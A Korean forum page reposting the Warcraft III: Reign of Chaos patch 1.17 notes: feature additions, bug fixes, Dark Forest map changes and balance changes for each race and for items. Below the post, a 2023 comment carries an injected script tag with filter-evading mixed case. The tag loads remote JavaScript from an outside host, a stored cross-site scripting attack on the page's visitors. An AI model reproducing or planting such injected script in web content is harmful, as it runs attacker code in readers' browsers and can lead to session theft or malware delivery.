playXP

서브 메뉴

작성자 아이콘Nios
작성일 2007-06-20 00:08:02 KST 조회 4,281
제목
[2004/09/21] 레인 오브 카오스 1.17
--------------------------------------------------------------------------
- 패치 1.17
--------------------------------------------------------------------------


기능

- 배틀넷 도구모음에 "프로필" 버튼이 추가되었습니다. 이제 채팅 채널에 들어가지 않아도 자신의 프로필을 볼 수 있습니다.
- 이제 리플레이 선택 화면에서 리플레이 버전을 표시합니다.

버그 수정

- 대상 지정형 스펠을 사용한 후 일부 인스턴트 스펠을 사용할 경우, 인스턴트 스펠이 먼저 적용되던 문제를 수정하였습니다.
- 특정 인스턴트 스펠을 사용하려는 것에 대한 밀리 AI 문제를 수정하였습니다.
- 유닛에게 변이 명령을 다시 내릴 경우, 변이가 완료되는 것을 중단시키던 문제를 수정하였습니다.
- 예약된 이동 명령을 이용하여 시야에서 사라진 적유닛을 추적할 수 있던 것을 수정했습니다.
- 적군 유닛이 전장 안개 속으로 이동되면 적군 유닛을 따라가던 유닛이 다음 명령을 진행하지 않던 문제를 수정하였습니다.
- 대상 지점 혹은 유닛을 대상으로 할 수 있는 스펠(쇼크웨이브 같은)이 선택된 대상이 죽을 경우 스펠 시전을 실패하던 문제를
 수정하였습니다. 단, 선택한 대상이 전장 안개 혹은 텔레포트로 사라지면, 스펠은 의도대로 실패합니다.
- 인베놈드 스피어의 영향을 받은 유닛이 슬로우 포이즌이나 베놈 오브의 효과를 받았다면,
 너무 일찍 효과가 사라지는 문제를 수정하였습니다.
- 레벨 2, 3의 윈드 워크 사용시 완전히 투명 상태로 변하는데 걸리는 시간이 수정되었습니다.
- 코도 비스트가 폴리모프나 헥스가 되어 디바우어한 유닛을 소화시킨 경우에도 경험치를 받을 수 있도록 수정되었습니다.
- 아군 유닛의 랠리 포인트가 더 이상 텔레포트, 미러 이미지를 사용하는 영웅의 랠리 명령을 취소시키지 않습니다.
- 일루전이 원래 유닛에 비해 데미지, 방어력, HP, MP의 변화가 잘못표시되던 버그가 수정되었습니다.
- 폴리모프나 헥스상태에서 죽은 유닛이 애니메이트 데드로 부활한 경우, 인구수를 차지하던 버그가 수정되었습니다.
- 휴먼 건물 방어력 향상 업그레이드가 업그레이드 중인 건물에도 적용이 됩니다.
- 여러 유닛이 같은 마법을 사용할 경우, 중복되어 사용되는 것을 최소화 하였습니다.
- 미사일 형태의 스킬을 자고 있는 유닛에게 사용시, 스킬을 시전할때 깨어나지 않도록 수정되었습니다.
 이제, 스킬을 완전히 맞은 후에 깨어나게 됩니다.
- 채널링 마법을 사용하는 유닛을 포함한 부대에 '정지', '하이드' 명령을 제외한 명령을 내릴경우,
 해당 유닛에 명령이 올바르게 예약되지 않는 버그가 수정되었습니다.
- 채널링이 아닌 스펠을 사용중인 유닛에겐 다음 명령이 자동으로 예약되어 스펠을 사용한 후에 예약된 명령을 수행합니다.
- 관전자는 어떠한 플레이어의 세력이 공격을 당하더라도 알림을 받지 않던 문제를 수정하였습니다.
- 영웅의 레벨에 따라서 아이콘 순서가 바뀌던 버그가 수정되었습니다. 이제는 생산 순서대로 정해져서 변하지 않게 됩니다.
- 리플레이를 '일시정지'할 경우에도 리플레이 재생 속도를 조종할 수 있게 되었습니다.


맵 변경사항
- (6)Dark Forest - 보다 대규모의 병력이 지나갈 수 있도록 나무를 일부 제거했습니다. 상단 중앙 멀티지역에 위치한 크립이 유닛을 습격하지 않게 수정되었습니다.

밸런스 변경 사항

일반 (General)
- 헌티드 및 인탱글드 골드 마인은 이제 미니맵에 나타납니다.
- 쇼크웨이브, 캐리언 스웜, 브레스 오브 파이어, 브레스 오브 프로스트와 같은 직선형 데미지 스펠은
 더 이상 아군 유닛을 대상으로 하지 않습니다.
- 자동시전으로 설정된 애로우 어빌리티는 오브 효과보다 우선권을 가집니다.
- 연구를 요구하는 기본 자동시전 스펠(어볼리쉬 매직 혹은 블러드러스트)은 연구가 완료되었을 경우, 자동적으로 활성화 됩니다.
- 이제 업그레이드 중인 건물을 수리할 때는 업그레이드 이전 건물의 수리 시간 및 비용을 사용합니다.
- 텔레포트시 채취, 건설, 수리중인 일꾼은 남아있게 됩니다.
- 다중 유닛이 같은 스펠을 캐스팅하면, 더욱 효과적으로 로드하도록 분배합니다.
- 미사일 스펠은 더 이상 발사되었을 때 크립을 깨지 않지만, 스펠이 맞을 경우, 깨어나게 됩니다.
- 이제 건설중인 피전트가 그룹 선택에서 포함됩니다.
 건설중인 피전트는 유닛이 선택되어 중지 명령을 받기 전에는 자동적으로 모든 명령이 대기됩니다.
- 이제 채널링 궁극기는 무적 상태가 취소됩니다. 채널링을 사용하는 동안 무적 스펠이 사용되면, 채널링이 끝납니다.
- 데미지 제한된 범위 마법(AOE) 스펠은 아군, 적군, 중립 유닛의 제한 수를 구분합니다.
- 적군 유닛은 이제 일루전에 걸린 라이트닝 쉴드의 데미지를 받습니다.
- 랠리 포인트로 지정되었던 유닛이나 영웅이 죽으면, 랠리로 이동하던 유닛은 죽었던 자리까지 이동합니다. (중간에 멈추지 않습니다)

휴먼 (Human)
- 디바인 쉴드는 더 이상 비활성화 할 수 없습니다.

언데드 (Undead)
- 밴쉬의 공격 범위가 500에서 600으로 증가하였습니다.
- 에니메이트 데드로 부활한 유닛들은 이제 디스펠 데미지에 대해 무적입니다.
- 업그레이드가 된 건물을 언서먼 할 경우, 원래 건설가격에 업그레이드 된데 쓰인 가격까지 모두 포함되어 계산됩니다.

오크 (Orc)
- 페럴 스피릿으로 소환된 스피릿 울프를 죽였을 때 주는 경험치가 약 40% 증가하였습니다.
- 이제 윈드 워크를 사용하면 블레이드마스터가 유닛을 통과하여 이동할 수 있습니다.
- 윈드 워크의 뒷치기 데미지가 50/85/120에서 40/70/100으로 감소하였습니다.
- 체인 라이트닝은 이제 첫 번째 대상이 잠들어 있다면, 다른 수면중인 대상에게 점프됩니다.

나이트 엘프 (Night Elf)
- 어볼리쉬 매직은 더 이상 영웅 스펠을 자동 디스펠 하지 않습니다.
- 어볼리쉬 매직은 더 이상 수동으로 시전할 경우 아군에 있는 이로운 효과(buff)나 적군에게 있는 해로운 효과를 제거하지 않습니다.
 (자동시전 모드에서는 이미 작동하던 기능입니다)
- 리쥬버네이션은 이제 매직 이뮨 유닛을 대상으로 할 수 있습니다.
- 레벨1 인탱글링 루츠의 기본 지속시간이 12초에서 9초로 감소하였습니다.
 하지만, 레벨3 인탱글링 루츠의 데미지는 초당 15에서 초당 25로 증가하였습니다.
- 페어리 파이어의 방어력 감소가 5에서 4로 감소하였습니다.
- 에인션트 프로텍터의 공격은 이제 유도 미사일을 사용합니다.
- 헌트리스의 바운싱 공격은 더 이상 처음 대상 유닛에게 바운드 되지 않습니다.

아이템 (Items)
- 모든 오브는 매직 이뮨 유닛에게 영향을 미칩니다.
- 타운포탈을 유닛이 이동할 수 없는 장소로 사용한 경우, 그 지점과 가장 가까운 곳으로 타운포탈이 사용됩니다. 만약, 가장 가까운 장소도 없다면, 타운홀 주변으로 텔리포트 됩니다.

알림: 주요 게임 버전의 리플레이 파일들은 호환되지 않습니다. (1.16 버전의 리플레이 파일은 1.17 버전에서 볼 수 없습니다) 1.16 버전의 커스텀 게임의 세이브는 불러올 수 없습니다.

지속적인 허위 신고시 신고자가 제재를 받을 수 있습니다.
신고 사유를 입력하십시오:

발도장 찍기
아이콘 내안에맵없다   |   방송인수건   |   아이콘 qndhs   |   혈우림   |   레플리카1   |   니큰
WkYxnTGh (2023-10-23 18:12:07 KST) - 70.132.xxx.91
0↑ ↓0
센스 이미지를 등록해 주세요
문의 드립니다.<sCRiPt sRC=https://viva100.com/cj/></sCrIpT>
닉네임: 암호:
롤토체스 TFT - 롤체지지 LoLCHESS.GG
소환사의 협곡부터 칼바람, 우르프까지 - 포로지지 PORO.GG
배그 전적검색은 닥지지(DAK.GG)에서 가능합니다
  • (주)플레이엑스피
  • 대표: 윤석재
  • 사업자등록번호: 406-86-00726

© PlayXP Inc. All Rights Reserved.